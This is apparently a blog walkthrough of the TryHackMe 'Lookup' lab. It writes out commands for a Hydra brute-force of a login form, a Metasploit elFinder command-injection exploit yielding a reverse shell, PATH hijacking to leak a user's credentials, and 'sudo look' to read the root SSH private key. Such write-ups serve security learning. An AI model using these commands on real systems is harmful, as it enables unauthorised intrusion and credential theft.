LOADING...

Breach the Quiet: Decoding the Lookup Lab



 

Breaking the Silence: A Deep Dive into the Lookup Lab

By Meheraz Hosen Siam

In penetration testing, it is easy to get stuck in a routine. The Lookup lab on TryHackMe is a perfect example of why flexibility is a hacker’s greatest asset. During this engagement, I navigated several hurdles, from stubborn VPN connections to environment-specific errors in the Metasploit Framework.

Here is the technical breakdown of how I breached the machine, the exact commands utilized, and the strategic lessons learned during the process.

1. The Gateway: Establishing the Tunnel

Visibility is the prerequisite for any attack. To interact with the target, I utilized OpenVPN to bridge my local Kali machine with the TryHackMe laboratory network.

Command: sudo openvpn your_config_file.ovpn

The Insight: Connectivity is never a given. I monitored the logs for the Initialization Sequence Completed string—the "green light" that signals the tunnel is active and the target is reachable.

2. Reconnaissance & Initial Access

The target hosted a login portal at lookup.thm. Through initial reconnaissance, I identified a potential user named jose. Rather than relying on manual guessing, I used Hydra to perform a targeted brute-force attack against the HTTP POST form.

The Attack:hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:user=^USER^&pass=^P^:F=Login failed" -t 64

Result: Successfully recovered the password: password123. This credential provided access to an authenticated dashboard featuring the elFinder file manager.

. Weaponization: The elFinder Exploit

The file manager version was vulnerable to a Command Injection flaw. I turned to the Metasploit Framework to weaponize this, specifically targeting the exiftran PHP connector.

The Metasploit Kill-Chain:

msfconsole -q

use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection

set RHOSTS files.lookup.thm

set VHOST files.lookup.thm

set LHOST tun0

set TARGETURI /exploit

The Insight: Troubleshooting the uninitialized constant error taught me that explicit configuration is key. Specifically, forcing LHOST to the tun0 interface ensures the reverse shell bypasses local network confusion and routes correctly through the VPN

4. Lateral Movement: The Path Hijacking Trick

Landing as www-data provided limited access. During post-exploitation, I discovered a custom binary, /usr/sbin/pwm, which executed the id command using a relative path rather than an absolute one. This opened the door for Path Hijacking.

The Maneuver:

  1. Stabilize the Shell: python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. Create a Malicious "id" Script: cd /tmp echo -e '#!/bin/bash\necho "uid=1001(think) gid=1001(think) groups=1001(think)"' > id chmod +x id

  3. Manipulate the Environment: export PATH=/tmp:$PATH

  4. Trigger the Payload: /usr/sbin/pwm

The Insight: If you control the environment, you control the execution. By prioritizing /tmp in the $PATH, I tricked the system into executing my script instead of the legitimate binary, leaking the credentials for the user think.

5. Privilege Escalation: The Skeleton Key

Now operating as the user think, I audited sudo permissions and discovered I could run the look utility with root privileges. While typically used for dictionary lookups, look can be abused to read protected system files.

The Final Blow:

Read the Root SSH Private Key

sudo look "" /root/.ssh/id_rsa

I extracted the private key, saved it to my local machine, and established an SSH session as root.

The Insight: You don't always need an external exploit to gain administrative control. "Living off the Land" (LotL) by utilizing built-in binaries like look is often the most effective path to total system compromise.

Final thing of Learning

The Lookup lab reinforced a core tenet of cybersecurity: Persistence beats complexity. Whether it was fixing a glitched Metasploit session or manipulating a system path, the win came from understanding the underlying logic of the OS rather than just running a script.

#Cybersecurity #PenetrationTesting #TryHackMe #Linux #EthicalHacking #BugHunting

ABOUT  ME:-


I am Meheraz Hosen Siam a Cybersecurity enthusiast focused on securing the digital landscape. I specialize in Web Application Penetration Testing and Security Research, helping identify and remediate critical security flaws before they can be exploited. You can help me with your suggestions in the comment section so post a comment and help me to improve myself 


Thank you for reading this article



#blog #Bug #Cybersecurity #Learning Journey #Linux #Penetration Testing #tryhackme

Comments

Post a Comment

> SHARE_THIS_ANALYSIS:

> SYSTEM_REACTIONS: